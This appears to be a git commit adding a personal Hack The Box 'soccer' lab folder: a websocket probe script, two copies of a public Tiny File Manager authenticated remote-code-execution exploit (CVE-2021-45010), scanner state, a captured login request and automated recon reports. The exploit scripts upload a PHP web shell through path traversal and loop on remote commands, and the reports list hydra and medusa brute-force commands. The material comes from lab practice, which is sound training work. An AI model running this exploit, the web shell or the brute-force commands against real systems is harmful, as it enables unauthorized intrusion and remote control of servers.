init htb

old htb folders
2023-08-29 21:53:22 +02:00
parent 62ab804867
commit 82b0759f1e
21891 changed files with 6277643 additions and 0 deletions
--- a/HTB/soccer/ape.py
+++ b/HTB/soccer/ape.py
@@ -0,0 +1,36 @@
+import requests, random
+from websocket import create_connection
+
+proxy = {'http':'http://127.0.0.1:8080'}
+ws_server = "ws://soc-player.soccer.htb:9091"
+
+if __name__ == '__main__':
+    # s = requests.session()
+    # r = s.get("http://soc-player.soccer.htb/")
+    # # print(r.text)
+    # #register
+    # email = f"email{random.randint(0,9999)}@example.com"
+    # user = f"user{random.randint(0,9999)}"
+    # password = "1234"
+    # data = {
+    #     'email':email,
+    #     'username': user,
+    #     'password': password
+    # }
+    # r = s.post("http://soc-player.soccer.htb/signup", data=data, proxies=proxy)
+    # # print(r.text)
+    # print(data)
+
+    # data = {
+    #     'email':'email%40example.com',
+    #     'password':'pass'
+    # }
+    #
+    # r = requests.post("http://soc-player.soccer.htb/login", data=data)
+    # print(r.text)
+    # s.get("http://soc-player.soccer.htb/check", proxies=proxy)
+    ws = create_connection(ws_server)
+    data = '{"id":"61334"}'
+    ws.send(data)
+    resp = ws.recv()
+    pass
--- a/HTB/soccer/exploit.sh
+++ b/HTB/soccer/exploit.sh
@@ -0,0 +1,141 @@
+#!/bin/bash
+# Exploit Title: Tiny File Manager 2.4.6 (Authenticated) Remote Code Execution 
+# Date: 14/03/2022
+# Exploit Author: FEBIN MON SAJI
+# Software Link: https://github.com/prasathmani/tinyfilemanager
+# Version: Tiny File Manager <= 2.4.3 
+# Tested on: Ubuntu 20.04
+# CVE : CVE-2021-45010
+# Reference: https://febin0x4e4a.wordpress.com/2022/01/23/tiny-file-manager-authenticated-rce/
+
+
+check(){
+
+which curl
+if  [ $? = 0 ]
+then
+printf "[✔] Curl found! \n"
+else
+printf "[❌] Curl not found! \n"
+exit
+fi
+
+which jq
+if  [ $? = 0 ]
+then
+printf "[✔] jq found! \n"
+else
+printf "[❌] jq not found! \n"
+exit
+fi
+}
+usage(){
+
+printf "
+TIny File Manager Authenticated RCE POC Exploit.
+
+By FEBIN
+
+$0 <URL> <Admin Username> <Password>
+
+Example: $0 http://files.ubuntu.local/index.php admin \"admin@123\"
+
+"
+}
+
+log-in(){
+URL=$1
+admin=$2
+pass=$3
+cookie=$(curl "$URL" -X POST -s -d "fm_usr=$admin&fm_pwd=$pass" -i | grep "Set-Cookie: " | sed s/"Set-Cookie: "//g | tr -d " " | tr ";" "\n" | head -1)
+
+if [ $cookie ]
+then
+printf "\n[+]  Login Success! Cookie: $cookie \n"
+else
+printf "\n[-] Logn Failed! \n"
+fi
+
+URL=${URL}
+}
+
+find_webroot(){
+
+
+webroot=$(curl -X POST "$URL?p=&upload" -d "type=upload&uploadurl=http://vyvyuytcuytcuycuytuy/&ajax=true" -H "Cookie: $cookie" -s | jq | grep file | tr -d '"' | tr -d "," | tr -d " " | sed s/"file:"//g | tr "/" "\n" | head --lines=-1 | tr "\n" "/" )
+
+
+if [ $webroot ]
+then
+printf "\n[*] Try to Leak Web root directory path \n\n"
+printf "[+] Found WEBROOT directory for tinyfilemanager using full path disclosure bug : $webroot \n\n" 
+else
+printf "[-] Can't find WEBROOT! Using default /var/www/html \n"
+webroot="/var/www/html/"
+fi
+}
+
+upload(){
+
+#webroot="/var/www/tiny/"
+shell="shell$RANDOM.php"
+echo "<?php system(\$_REQUEST['cmd']); ?>" > /tmp/$shell
+
+
+
+curl $URL?p= -X POST --proxy http://127.0.0.1:8080 -s -H "User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0" -b $cookie -F "p=" -F "fullpath=../../../../../../../..${webroot}${shell}" -F "file=@/tmp/$shell" | grep "successful"
+
+
+}
+
+exploit(){
+
+WEB_URL=$(printf "$URL" | tr "/" "\n" | head --lines=-1 | tr "\n" "/")
+
+upload
+
+
+if [ $? = 0 ]
+then
+printf "[+] File Upload Successful! \n"
+else
+printf "[-] File Upload Unsuccessful! Exiting! \n"
+exit 1
+fi
+
+
+printf "[+] Checking for the shell \n"
+
+
+curl --proxy http://127.0.0.1:8080 ${WEB_URL}/${shell}?cmd=echo%20found -s | head -1 | grep "found" >/dev/null
+if [ $? = 0 ]
+then
+printf "[+] Shell found ${WEB_URL}/$shell \n"
+else 
+printf "[-] Shell not Found! It might be uploaded somewhere else in the server or got deleted. Exiting! \n"
+exit 2
+fi
+
+printf "[+] Getting shell access! \n\n"
+
+while true
+do
+printf "$> "
+read cmd
+curl --proxy http://127.0.0.1:8080 ${WEB_URL}/$shell -s -X POST -d "cmd=${cmd}"
+done
+}
+
+if [ $1 ] && [ $2 ] && [ $3 ]
+then
+check
+log-in $1 $2 $3
+
+find_webroot
+
+
+exploit
+else
+usage
+fi
+
--- a/HTB/soccer/exploit.sh.1
+++ b/HTB/soccer/exploit.sh.1
@@ -0,0 +1,141 @@
+#!/bin/bash
+# Exploit Title: Tiny File Manager 2.4.6 (Authenticated) Remote Code Execution 
+# Date: 14/03/2022
+# Exploit Author: FEBIN MON SAJI
+# Software Link: https://github.com/prasathmani/tinyfilemanager
+# Version: Tiny File Manager <= 2.4.3 
+# Tested on: Ubuntu 20.04
+# CVE : CVE-2021-45010
+# Reference: https://febin0x4e4a.wordpress.com/2022/01/23/tiny-file-manager-authenticated-rce/
+
+
+check(){
+
+which curl
+if  [ $? = 0 ]
+then
+printf "[✔] Curl found! \n"
+else
+printf "[❌] Curl not found! \n"
+exit
+fi
+
+which jq
+if  [ $? = 0 ]
+then
+printf "[✔] jq found! \n"
+else
+printf "[❌] jq not found! \n"
+exit
+fi
+}
+usage(){
+
+printf "
+TIny File Manager Authenticated RCE POC Exploit.
+
+By FEBIN
+
+$0 <URL> <Admin Username> <Password>
+
+Example: $0 http://files.ubuntu.local/index.php admin \"admin@123\"
+
+"
+}
+
+log-in(){
+URL=$1
+admin=$2
+pass=$3
+cookie=$(curl "$URL" -X POST -s -d "fm_usr=$admin&fm_pwd=$pass" -i | grep "Set-Cookie: " | sed s/"Set-Cookie: "//g | tr -d " " | tr ";" "\n" | head -1)
+
+if [ $cookie ]
+then
+printf "\n[+]  Login Success! Cookie: $cookie \n"
+else
+printf "\n[-] Logn Failed! \n"
+fi
+
+URL=${URL}
+}
+
+find_webroot(){
+
+
+webroot=$(curl -X POST "$URL?p=&upload" -d "type=upload&uploadurl=http://vyvyuytcuytcuycuytuy/&ajax=true" -H "Cookie: $cookie" -s | jq | grep file | tr -d '"' | tr -d "," | tr -d " " | sed s/"file:"//g | tr "/" "\n" | head --lines=-1 | tr "\n" "/" )
+
+
+if [ $webroot ]
+then
+printf "\n[*] Try to Leak Web root directory path \n\n"
+printf "[+] Found WEBROOT directory for tinyfilemanager using full path disclosure bug : $webroot \n\n" 
+else
+printf "[-] Can't find WEBROOT! Using default /var/www/html \n"
+webroot="/var/www/html"
+fi
+}
+
+upload(){
+
+#webroot="/var/www/tiny/"
+shell="shell$RANDOM.php"
+echo "<?php system(\$_REQUEST['cmd']); ?>" > /tmp/$shell
+
+
+
+curl $URL?p= -X POST -s -H "User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0" -b $cookie -F "p=" -F "fullpath=../../../../../../../..${webroot}/${shell}" -F "file=@/tmp/$shell" | grep "successful"
+
+
+}
+
+exploit(){
+
+WEB_URL=$(printf "$URL" | tr "/" "\n" | head --lines=-1 | tr "\n" "/")
+
+upload
+
+
+if [ $? = 0 ]
+then
+printf "[+] File Upload Successful! \n"
+else
+printf "[-] File Upload Unsuccessful! Exiting! \n"
+exit 1
+fi
+
+
+printf "[+] Checking for the shell \n"
+
+
+curl ${WEB_URL}/${shell}?cmd=echo%20found -s | head -1 | grep "found" >/dev/null
+if [ $? = 0 ]
+then
+printf "[+] Shell found ${WEB_URL}/$shell \n"
+else 
+printf "[-] Shell not Found! It might be uploaded somewhere else in the server or got deleted. Exiting! \n"
+exit 2
+fi
+
+printf "[+] Getting shell access! \n\n"
+
+while true
+do
+printf "$> "
+read cmd
+curl  ${WEB_URL}/$shell -s -X POST -d "cmd=${cmd}"
+done
+}
+
+if [ $1 ] && [ $2 ] && [ $3 ]
+then
+check
+log-in $1 $2 $3
+
+find_webroot
+
+
+exploit
+else
+usage
+fi
+
--- a/HTB/soccer/ferox-http_10_10_11_194:80_-1674662797.state
+++ b/HTB/soccer/ferox-http_10_10_11_194:80_-1674662797.state
@@ -0,0 +1 @@
+{"scans":[{"id":"2689ff59b1bb4952bd0760a96a0670d3","url":"http://10.10.11.194:80/","normalized_url":"http://10.10.11.194:80/","scan_type":"Directory","status":"Running","num_requests":1543822}],"config":{"type":"configuration","wordlist":"/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt","config":"/etc/feroxbuster/ferox-config.toml","proxy":"","replay_proxy":"","target_url":"http://10.10.11.194:80/","status_codes":[200,204,301,302,307,308,401,403,405,500],"replay_codes":[200,204,301,302,307,308,401,403,405,500],"filter_status":[],"threads":50,"timeout":7,"verbosity":1,"silent":false,"quiet":true,"auto_bail":false,"auto_tune":false,"json":false,"output":"/home/kali/htb/soccer/results/scans/tcp80/tcp_80_http_feroxbuster_directory-list-2.3-medium.txt","debug_log":"","user_agent":"feroxbuster/2.7.3","random_agent":false,"redirects":false,"insecure":true,"extensions":["txt","html","php","asp","aspx","jsp"],"methods":["GET"],"data":[],"headers":{},"queries":[],"no_recursion":false,"extract_links":true,"add_slash":false,"stdin":false,"depth":4,"scan_limit":0,"parallel":0,"rate_limit":0,"filter_size":[],"filter_line_count":[],"filter_word_count":[],"filter_regex":[],"dont_filter":false,"resumed":false,"resume_from":"","save_state":true,"time_limit":"","filter_similar":[],"url_denylist":[],"regex_denylist":[],"collect_extensions":false,"dont_collect":["tif","tiff","ico","cur","bmp","webp","svg","png","jpg","jpeg","jfif","gif","avif","apng","pjpeg","pjp","mov","wav","mpg","mpeg","mp3","mp4","m4a","m4p","m4v","ogg","webm","ogv","oga","flac","aac","3gp","css","zip","xls","xml","gz","tgz"],"collect_backups":false,"collect_words":false,"force_recursion":false},"responses":[{"type":"response","url":"http://10.10.11.194/09d1efe14b0747d9a4f8be3e7aa30913","original_url":"http://10.10.11.194:80/","path":"/09d1efe14b0747d9a4f8be3e7aa30913","wildcard":true,"status":301,"method":"GET","content_length":178,"line_count":7,"word_count":12,"headers":{"server":"nginx/1.18.0 (Ubuntu)","connection":"keep-alive","content-length":"178","location":"http://soccer.htb/09d1efe14b0747d9a4f8be3e7aa30913","content-type":"text/html","date":"Wed, 25 Jan 2023 15:54:11 GMT"},"extension":""},{"type":"response","url":"http://10.10.11.194/71abea99cb5147799a27f2ebfeb66255a7c396b7c7dd43a3b4d9e8566f2c2137400ca2109ffd4c8985227c3b004a6257","original_url":"http://10.10.11.194:80/","path":"/71abea99cb5147799a27f2ebfeb66255a7c396b7c7dd43a3b4d9e8566f2c2137400ca2109ffd4c8985227c3b004a6257","wildcard":true,"status":301,"method":"GET","content_length":178,"line_count":7,"word_count":12,"headers":{"server":"nginx/1.18.0 (Ubuntu)","date":"Wed, 25 Jan 2023 15:54:11 GMT","content-length":"178","connection":"keep-alive","location":"http://soccer.htb/71abea99cb5147799a27f2ebfeb66255a7c396b7c7dd43a3b4d9e8566f2c2137400ca2109ffd4c8985227c3b004a6257","content-type":"text/html"},"extension":""}],"statistics":{"type":"statistics","timeouts":632,"requests":1024705,"expected_per_scan":1543822,"total_expected":1543822,"errors":659,"successes":0,"redirects":1024045,"client_errors":1,"server_errors":0,"total_scans":1,"initial_targets":0,"links_extracted":0,"extensions_collected":0,"status_200s":0,"status_301s":1024045,"status_302s":0,"status_401s":0,"status_403s":0,"status_429s":0,"status_500s":0,"status_503s":0,"status_504s":0,"status_508s":0,"wildcards_filtered":1024041,"responses_filtered":1024041,"resources_discovered":2,"url_format_errors":0,"redirection_errors":0,"connection_errors":27,"request_errors":0,"directory_scan_times":[],"total_runtime":[0.0]},"collected_extensions":[],"filters":[{"dynamic":18446744073709551615,"size":178,"method":"GET","dont_filter":false}]}
--- a/HTB/soccer/login.req
+++ b/HTB/soccer/login.req
@@ -0,0 +1,15 @@
+POST /login HTTP/1.1
+Host: dev.stocker.htb
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 27
+Origin: http://dev.stocker.htb
+Connection: close
+Referer: http://dev.stocker.htb/login
+Cookie: connect.sid=s%3AStBXLPPx92-tO1kbJH_hnqg_Wpuys49p.ubWznXOib%2FgMRlCMZ6saj8iV3BAuf5TR5gYeW79EDOg
+Upgrade-Insecure-Requests: 1
+
+username=user&password=pass
--- a/HTB/soccer/results/report/local.txt
+++ b/HTB/soccer/results/report/local.txt
--- a/HTB/soccer/results/report/notes.txt
+++ b/HTB/soccer/results/report/notes.txt
@@ -0,0 +1,12 @@
+[*] ssh found on tcp/22.
+
+
+
+[*] http found on tcp/80.
+
+
+
+[*] xmltec-xmlmail found on tcp/9091.
+
+
+
--- a/HTB/soccer/results/report/proof.txt
+++ b/HTB/soccer/results/report/proof.txt
--- a/HTB/soccer/results/report/report.md/10.10.11.194/Commands.md
+++ b/HTB/soccer/results/report/report.md/10.10.11.194/Commands.md
@@ -0,0 +1,27 @@
+```bash
+nmap -vv --reason -Pn -T4 -sV -sC --version-all -A --osscan-guess -oN "/home/kali/htb/soccer/results/scans/_quick_tcp_nmap.txt" -oX "/home/kali/htb/soccer/results/scans/xml/_quick_tcp_nmap.xml" 10.10.11.194
+
+nmap -vv --reason -Pn -T4 -sV -sC --version-all -A --osscan-guess -p- -oN "/home/kali/htb/soccer/results/scans/_full_tcp_nmap.txt" -oX "/home/kali/htb/soccer/results/scans/xml/_full_tcp_nmap.xml" 10.10.11.194
+
+nmap -vv --reason -Pn -T4 -sV -p 22 --script="banner,ssh2-enum-algos,ssh-hostkey,ssh-auth-methods" -oN "/home/kali/htb/soccer/results/scans/tcp22/tcp_22_ssh_nmap.txt" -oX "/home/kali/htb/soccer/results/scans/tcp22/xml/tcp_22_ssh_nmap.xml" 10.10.11.194
+
+feroxbuster -u http://10.10.11.194:80/ -t 50 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x "txt,html,php,asp,aspx,jsp" -v -k -q -e -o "/home/kali/htb/soccer/results/scans/tcp80/tcp_80_http_feroxbuster_directory-list-2.3-medium.txt"
+
+curl -sSikf http://10.10.11.194:80/.well-known/security.txt
+
+curl -sSikf http://10.10.11.194:80/robots.txt
+
+curl -sSik http://10.10.11.194:80/
+
+nmap -vv --reason -Pn -T4 -sV -p 80 --script="banner,(http* or ssl*) and not (brute or broadcast or dos or external or http-slowloris* or fuzzer)" -oN "/home/kali/htb/soccer/results/scans/tcp80/tcp_80_http_nmap.txt" -oX "/home/kali/htb/soccer/results/scans/tcp80/xml/tcp_80_http_nmap.xml" 10.10.11.194
+
+curl -sk -o /dev/null -H "Host: TftyUjcxjULDwbGIAAgk.soccer.htb" http://soccer.htb:80/ -w "%{size_download}"
+
+whatweb --color=never --no-errors -a 3 -v http://10.10.11.194:80 2>&1
+
+wkhtmltoimage --format png http://10.10.11.194:80/ /home/kali/htb/soccer/results/scans/tcp80/tcp_80_http_screenshot.png
+
+ffuf -u http://soccer.htb:80/ -t 10 -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -H "Host: FUZZ.soccer.htb" -fs 178 -noninteractive -s | tee "/home/kali/htb/soccer/results/scans/tcp80/tcp_80_http_soccer.htb_vhosts_subdomains-top1million-110000.txt"
+
+
+```
--- a/HTB/soccer/results/report/report.md/10.10.11.194/Manual
+++ b/HTB/soccer/results/report/report.md/10.10.11.194/Manual
@@ -0,0 +1,35 @@
+```bash
+[*] ssh on tcp/22
+
+	[-] Bruteforce logins:
+
+		hydra -L "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e nsr -s 22 -o "/home/kali/htb/soccer/results/scans/tcp22/tcp_22_ssh_hydra.txt" ssh://10.10.11.194
+
+		medusa -U "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e ns -n 22 -O "/home/kali/htb/soccer/results/scans/tcp22/tcp_22_ssh_medusa.txt" -M ssh -h 10.10.11.194
+
+[*] http on tcp/80
+
+	[-] (feroxbuster) Multi-threaded recursive directory/file enumeration for web servers using various wordlists:
+
+		feroxbuster -u http://10.10.11.194:80 -t 50 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x "txt,html,php,asp,aspx,jsp" -v -k -e -o /home/kali/htb/soccer/results/scans/tcp80/tcp_80_http_feroxbuster_dirbuster.txt
+
+	[-] Credential bruteforcing commands (don't run these without modifying them):
+
+		hydra -L "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e nsr -s 80 -o "/home/kali/htb/soccer/results/scans/tcp80/tcp_80_http_auth_hydra.txt" http-get://10.10.11.194/path/to/auth/area
+
+		medusa -U "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e ns -n 80 -O "/home/kali/htb/soccer/results/scans/tcp80/tcp_80_http_auth_medusa.txt" -M http -h 10.10.11.194 -m DIR:/path/to/auth/area
+
+		hydra -L "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e nsr -s 80 -o "/home/kali/htb/soccer/results/scans/tcp80/tcp_80_http_form_hydra.txt" http-post-form://10.10.11.194/path/to/login.php:"username=^USER^&password=^PASS^":"invalid-login-message"
+
+		medusa -U "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e ns -n 80 -O "/home/kali/htb/soccer/results/scans/tcp80/tcp_80_http_form_medusa.txt" -M web-form -h 10.10.11.194 -m FORM:/path/to/login.php -m FORM-DATA:"post?username=&password=" -m DENY-SIGNAL:"invalid login message"
+
+	[-] (nikto) old but generally reliable web server enumeration tool:
+
+		nikto -ask=no -h http://10.10.11.194:80 2>&1 | tee "/home/kali/htb/soccer/results/scans/tcp80/tcp_80_http_nikto.txt"
+
+	[-] (wpscan) WordPress Security Scanner (useful if WordPress is found):
+
+		wpscan --url http://10.10.11.194:80/ --no-update -e vp,vt,tt,cb,dbe,u,m --plugins-detection aggressive --plugins-version-detection aggressive -f cli-no-color 2>&1 | tee "/home/kali/htb/soccer/results/scans/tcp80/tcp_80_http_wpscan.txt"
+
+
+```
--- a/HTB/soccer/results/report/report.md/10.10.11.194/Patterns.md
+++ b/HTB/soccer/results/report/report.md/10.10.11.194/Patterns.md
@@ -0,0 +1,8 @@
+Identified HTTP Server: nginx/1.18.0 (Ubuntu)
+
+Nmap script found a potential vulnerability. (State: VULNERABLE)
+
+CVE Identified: CVE-2011-3192
+
+CVE Identified: CVE-2011-3192
+
--- a/HTB/soccer/results/report/report.md/10.10.11.194/Port
+++ b/HTB/soccer/results/report/report.md/10.10.11.194/Port
@@ -0,0 +1,105 @@
+```bash
+nmap -vv --reason -Pn -T4 -sV -sC --version-all -A --osscan-guess -p- -oN "/home/kali/htb/soccer/results/scans/_full_tcp_nmap.txt" -oX "/home/kali/htb/soccer/results/scans/xml/_full_tcp_nmap.xml" 10.10.11.194
+```
+
+[/home/kali/htb/soccer/results/scans/_full_tcp_nmap.txt](file:///home/kali/htb/soccer/results/scans/_full_tcp_nmap.txt):
+
+```
+# Nmap 7.93 scan initiated Fri Jan 27 10:41:32 2023 as: nmap -vv --reason -Pn -T4 -sV -sC --version-all -A --osscan-guess -p- -oN /home/kali/htb/soccer/results/scans/_full_tcp_nmap.txt -oX /home/kali/htb/soccer/results/scans/xml/_full_tcp_nmap.xml 10.10.11.194
+Nmap scan report for soccer.htb (10.10.11.194)
+Host is up, received user-set (0.056s latency).
+Scanned at 2023-01-27 10:41:32 CET for 50s
+Not shown: 65532 closed tcp ports (conn-refused)
+PORT     STATE SERVICE         REASON  VERSION
+22/tcp   open  ssh             syn-ack OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
+| ssh-hostkey: 
+|   3072 ad0d84a3fdcc98a478fef94915dae16d (RSA)
+| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQChXu/2AxokRA9pcTIQx6HKyiO0odku5KmUpklDRNG+9sa6olMd4dSBq1d0rGtsO2rNJRLQUczml6+N5DcCasAZUShDrMnitsRvG54x8GrJyW4nIx4HOfXRTsNqImBadIJtvIww1L7H1DPzMZYJZj/oOwQHXvp85a2hMqMmoqsljtS/jO3tk7NUKA/8D5KuekSmw8m1pPEGybAZxlAYGu3KbasN66jmhf0ReHg3Vjx9e8FbHr3ksc/MimSMfRq0lIo5fJ7QAnbttM5ktuQqzvVjJmZ0+aL7ZeVewTXLmtkOxX9E5ldihtUFj8C6cQroX69LaaN/AXoEZWl/v1LWE5Qo1DEPrv7A6mIVZvWIM8/AqLpP8JWgAQevOtby5mpmhSxYXUgyii5xRAnvDWwkbwxhKcBIzVy4x5TXinVR7FrrwvKmNAG2t4lpDgmryBZ0YSgxgSAcHIBOglugehGZRHJC9C273hs44EToGCrHBY8n2flJe7OgbjEL8Il3SpfUEF0=
+|   256 dfd6a39f68269dfc7c6a0c29e961f00c (ECDSA)
+| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBIy3gWUPD+EqFcmc0ngWeRLfCr68+uiuM59j9zrtLNRcLJSTJmlHUdcq25/esgeZkyQ0mr2RZ5gozpBd5yzpdzk=
+|   256 5797565def793c2fcbdb35fff17c615c (ED25519)
+|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIJ2Pj1mZ0q8u/E8K49Gezm3jguM3d8VyAYsX0QyaN6H/
+80/tcp   open  http            syn-ack nginx 1.18.0 (Ubuntu)
+|_http-title: Soccer - Index 
+| http-methods: 
+|_  Supported Methods: GET HEAD
+|_http-server-header: nginx/1.18.0 (Ubuntu)
+9091/tcp open  xmltec-xmlmail? syn-ack
+| fingerprint-strings: 
+|   DNSStatusRequestTCP, DNSVersionBindReqTCP, Hello, Help, RPCCheck, drda, informix: 
+|     HTTP/1.1 400 Bad Request
+|     Connection: close
+|   GetRequest: 
+|     HTTP/1.1 404 Not Found
+|     Content-Security-Policy: default-src 'none'
+|     X-Content-Type-Options: nosniff
+|     Content-Type: text/html; charset=utf-8
+|     Content-Length: 139
+|     Date: Fri, 27 Jan 2023 09:41:51 GMT
+|     Connection: close
+|     <!DOCTYPE html>
+|     <html lang="en">
+|     <head>
+|     <meta charset="utf-8">
+|     <title>Error</title>
+|     </head>
+|     <body>
+|     <pre>Cannot GET /</pre>
+|     </body>
+|     </html>
+|   HTTPOptions, RTSPRequest: 
+|     HTTP/1.1 404 Not Found
+|     Content-Security-Policy: default-src 'none'
+|     X-Content-Type-Options: nosniff
+|     Content-Type: text/html; charset=utf-8
+|     Content-Length: 143
+|     Date: Fri, 27 Jan 2023 09:41:52 GMT
+|     Connection: close
+|     <!DOCTYPE html>
+|     <html lang="en">
+|     <head>
+|     <meta charset="utf-8">
+|     <title>Error</title>
+|     </head>
+|     <body>
+|     <pre>Cannot OPTIONS /</pre>
+|     </body>
+|_    </html>
+1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
+SF-Port9091-TCP:V=7.93%I=9%D=1/27%Time=63D39C5A%P=x86_64-pc-linux-gnu%r(in
+SF:formix,2F,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nConnection:\x20close\r
+SF:\n\r\n")%r(drda,2F,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nConnection:\x
+SF:20close\r\n\r\n")%r(GetRequest,168,"HTTP/1\.1\x20404\x20Not\x20Found\r\
+SF:nContent-Security-Policy:\x20default-src\x20'none'\r\nX-Content-Type-Op
+SF:tions:\x20nosniff\r\nContent-Type:\x20text/html;\x20charset=utf-8\r\nCo
+SF:ntent-Length:\x20139\r\nDate:\x20Fri,\x2027\x20Jan\x202023\x2009:41:51\
+SF:x20GMT\r\nConnection:\x20close\r\n\r\n<!DOCTYPE\x20html>\n<html\x20lang
+SF:=\"en\">\n<head>\n<meta\x20charset=\"utf-8\">\n<title>Error</title>\n</
+SF:head>\n<body>\n<pre>Cannot\x20GET\x20/</pre>\n</body>\n</html>\n")%r(HT
+SF:TPOptions,16C,"HTTP/1\.1\x20404\x20Not\x20Found\r\nContent-Security-Pol
+SF:icy:\x20default-src\x20'none'\r\nX-Content-Type-Options:\x20nosniff\r\n
+SF:Content-Type:\x20text/html;\x20charset=utf-8\r\nContent-Length:\x20143\
+SF:r\nDate:\x20Fri,\x2027\x20Jan\x202023\x2009:41:52\x20GMT\r\nConnection:
+SF:\x20close\r\n\r\n<!DOCTYPE\x20html>\n<html\x20lang=\"en\">\n<head>\n<me
+SF:ta\x20charset=\"utf-8\">\n<title>Error</title>\n</head>\n<body>\n<pre>C
+SF:annot\x20OPTIONS\x20/</pre>\n</body>\n</html>\n")%r(RTSPRequest,16C,"HT
+SF:TP/1\.1\x20404\x20Not\x20Found\r\nContent-Security-Policy:\x20default-s
+SF:rc\x20'none'\r\nX-Content-Type-Options:\x20nosniff\r\nContent-Type:\x20
+SF:text/html;\x20charset=utf-8\r\nContent-Length:\x20143\r\nDate:\x20Fri,\
+SF:x2027\x20Jan\x202023\x2009:41:52\x20GMT\r\nConnection:\x20close\r\n\r\n
+SF:<!DOCTYPE\x20html>\n<html\x20lang=\"en\">\n<head>\n<meta\x20charset=\"u
+SF:tf-8\">\n<title>Error</title>\n</head>\n<body>\n<pre>Cannot\x20OPTIONS\
+SF:x20/</pre>\n</body>\n</html>\n")%r(RPCCheck,2F,"HTTP/1\.1\x20400\x20Bad
+SF:\x20Request\r\nConnection:\x20close\r\n\r\n")%r(DNSVersionBindReqTCP,2F
+SF:,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nConnection:\x20close\r\n\r\n")%
+SF:r(DNSStatusRequestTCP,2F,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nConnect
+SF:ion:\x20close\r\n\r\n")%r(Hello,2F,"HTTP/1\.1\x20400\x20Bad\x20Request\
+SF:r\nConnection:\x20close\r\n\r\n")%r(Help,2F,"HTTP/1\.1\x20400\x20Bad\x2
+SF:0Request\r\nConnection:\x20close\r\n\r\n");
+Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
+
+Read data files from: /usr/bin/../share/nmap
+Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
+# Nmap done at Fri Jan 27 10:42:22 2023 -- 1 IP address (1 host up) scanned in 50.63 seconds
+
+```
--- a/HTB/soccer/results/report/report.md/10.10.11.194/Port
+++ b/HTB/soccer/results/report/report.md/10.10.11.194/Port
@@ -0,0 +1,105 @@
+```bash
+nmap -vv --reason -Pn -T4 -sV -sC --version-all -A --osscan-guess -oN "/home/kali/htb/soccer/results/scans/_quick_tcp_nmap.txt" -oX "/home/kali/htb/soccer/results/scans/xml/_quick_tcp_nmap.xml" 10.10.11.194
+```
+
+[/home/kali/htb/soccer/results/scans/_quick_tcp_nmap.txt](file:///home/kali/htb/soccer/results/scans/_quick_tcp_nmap.txt):
+
+```
+# Nmap 7.93 scan initiated Fri Jan 27 10:41:32 2023 as: nmap -vv --reason -Pn -T4 -sV -sC --version-all -A --osscan-guess -oN /home/kali/htb/soccer/results/scans/_quick_tcp_nmap.txt -oX /home/kali/htb/soccer/results/scans/xml/_quick_tcp_nmap.xml 10.10.11.194
+Nmap scan report for soccer.htb (10.10.11.194)
+Host is up, received user-set (0.033s latency).
+Scanned at 2023-01-27 10:41:32 CET for 46s
+Not shown: 997 closed tcp ports (conn-refused)
+PORT     STATE SERVICE         REASON  VERSION
+22/tcp   open  ssh             syn-ack OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
+| ssh-hostkey: 
+|   3072 ad0d84a3fdcc98a478fef94915dae16d (RSA)
+| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQChXu/2AxokRA9pcTIQx6HKyiO0odku5KmUpklDRNG+9sa6olMd4dSBq1d0rGtsO2rNJRLQUczml6+N5DcCasAZUShDrMnitsRvG54x8GrJyW4nIx4HOfXRTsNqImBadIJtvIww1L7H1DPzMZYJZj/oOwQHXvp85a2hMqMmoqsljtS/jO3tk7NUKA/8D5KuekSmw8m1pPEGybAZxlAYGu3KbasN66jmhf0ReHg3Vjx9e8FbHr3ksc/MimSMfRq0lIo5fJ7QAnbttM5ktuQqzvVjJmZ0+aL7ZeVewTXLmtkOxX9E5ldihtUFj8C6cQroX69LaaN/AXoEZWl/v1LWE5Qo1DEPrv7A6mIVZvWIM8/AqLpP8JWgAQevOtby5mpmhSxYXUgyii5xRAnvDWwkbwxhKcBIzVy4x5TXinVR7FrrwvKmNAG2t4lpDgmryBZ0YSgxgSAcHIBOglugehGZRHJC9C273hs44EToGCrHBY8n2flJe7OgbjEL8Il3SpfUEF0=
+|   256 dfd6a39f68269dfc7c6a0c29e961f00c (ECDSA)
